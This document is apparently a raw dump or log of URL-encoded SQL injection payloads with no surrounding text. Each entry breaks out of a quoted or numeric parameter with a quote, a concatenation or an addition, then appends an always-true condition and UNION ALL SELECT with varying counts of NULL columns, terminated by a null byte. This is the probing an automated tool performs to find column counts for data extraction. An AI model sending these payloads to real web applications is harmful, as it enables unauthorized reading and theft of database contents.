1%27%20WHERE%203314%3D3314%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1%27%20WHERE%201727%3D1727%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1%22%20WHERE%203989%3D3989%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1%22%20WHERE%207013%3D7013%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1%22%20WHERE%207435%3D7435%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1%22%20WHERE%208179%3D8179%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1%22%20WHERE%204180%3D4180%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1%22%20WHERE%207918%3D7918%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1%22%20WHERE%209328%3D9328%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1%22%20WHERE%209772%3D9772%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1%22%20WHERE%201650%3D1650%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1%22%20WHERE%203594%3D3594%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1%27%20%7C%7C%20%28SELECT%204958%20FROM%20DUAL%20WHERE%206114%3D6114%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%209794%20FROM%20DUAL%20WHERE%209780%3D9780%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%208219%20FROM%20DUAL%20WHERE%208074%3D8074%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%207788%20FROM%20DUAL%20WHERE%202272%3D2272%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%206049%20FROM%20DUAL%20WHERE%208519%3D8519%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%205819%20FROM%20DUAL%20WHERE%208062%3D8062%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%202917%20FROM%20DUAL%20WHERE%209725%3D9725%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%202213%20FROM%20DUAL%20WHERE%202801%3D2801%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%203519%20FROM%20DUAL%20WHERE%204817%3D4817%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%203697%20FROM%20DUAL%20WHERE%203686%3D3686%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%207111%20WHERE%208446%3D8446%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%202801%20WHERE%201578%3D1578%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%207144%20WHERE%209185%3D9185%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%208565%20WHERE%204473%3D4473%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%207441%20WHERE%206223%3D6223%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%202032%20WHERE%202346%3D2346%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%206240%20WHERE%204779%3D4779%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%208405%20WHERE%209457%3D9457%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%207969%20WHERE%201714%3D1714%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%209540%20WHERE%205237%3D5237%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%7C%7C%20%27 1%20%2B%20%28SELECT%204313%20FROM%20DUAL%20WHERE%206460%3D6460%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29 1%20%2B%20%28SELECT%202679%20FROM%20DUAL%20WHERE%205419%3D5419%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29 1%20%2B%20%28SELECT%207862%20FROM%20DUAL%20WHERE%204848%3D4848%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29 1%20%2B%20%28SELECT%203608%20FROM%20DUAL%20WHERE%206429%3D6429%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29 1%20%2B%20%28SELECT%207749%20FROM%20DUAL%20WHERE%204113%3D4113%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29 1%20%2B%20%28SELECT%201443%20FROM%20DUAL%20WHERE%202581%3D2581%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29 1%20%2B%20%28SELECT%205792%20FROM%20DUAL%20WHERE%207187%3D7187%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29 1%20%2B%20%28SELECT%209998%20FROM%20DUAL%20WHERE%201157%3D1157%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29 1%20%2B%20%28SELECT%201144%20FROM%20DUAL%20WHERE%204032%3D4032%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29 1%20%2B%20%28SELECT%209746%20FROM%20DUAL%20WHERE%202155%3D2155%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29 1%20%2B%20%28SELECT%202079%20WHERE%208643%3D8643%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29 1%20%2B%20%28SELECT%202922%20WHERE%209076%3D9076%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29 1%20%2B%20%28SELECT%204271%20WHERE%207686%3D7686%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29 1%20%2B%20%28SELECT%201663%20WHERE%207439%3D7439%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29 1%20%2B%20%28SELECT%209719%20WHERE%208862%3D8862%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29 1%20%2B%20%28SELECT%207145%20WHERE%206601%3D6601%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29 1%20%2B%20%28SELECT%206132%20WHERE%203212%3D3212%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29 1%20%2B%20%28SELECT%208854%20WHERE%208366%3D8366%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29 1%20%2B%20%28SELECT%205991%20WHERE%209262%3D9262%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29 1%20%2B%20%28SELECT%206708%20WHERE%204965%3D4965%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29 1%27%20%2B%20%28SELECT%20%27zZMh%27%20FROM%20DUAL%20WHERE%204622%3D4622%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27yAHE%27%20FROM%20DUAL%20WHERE%209101%3D9101%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27evQc%27%20FROM%20DUAL%20WHERE%201768%3D1768%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27rPrM%27%20FROM%20DUAL%20WHERE%202502%3D2502%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27OgmD%27%20FROM%20DUAL%20WHERE%207352%3D7352%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%2B%20%27 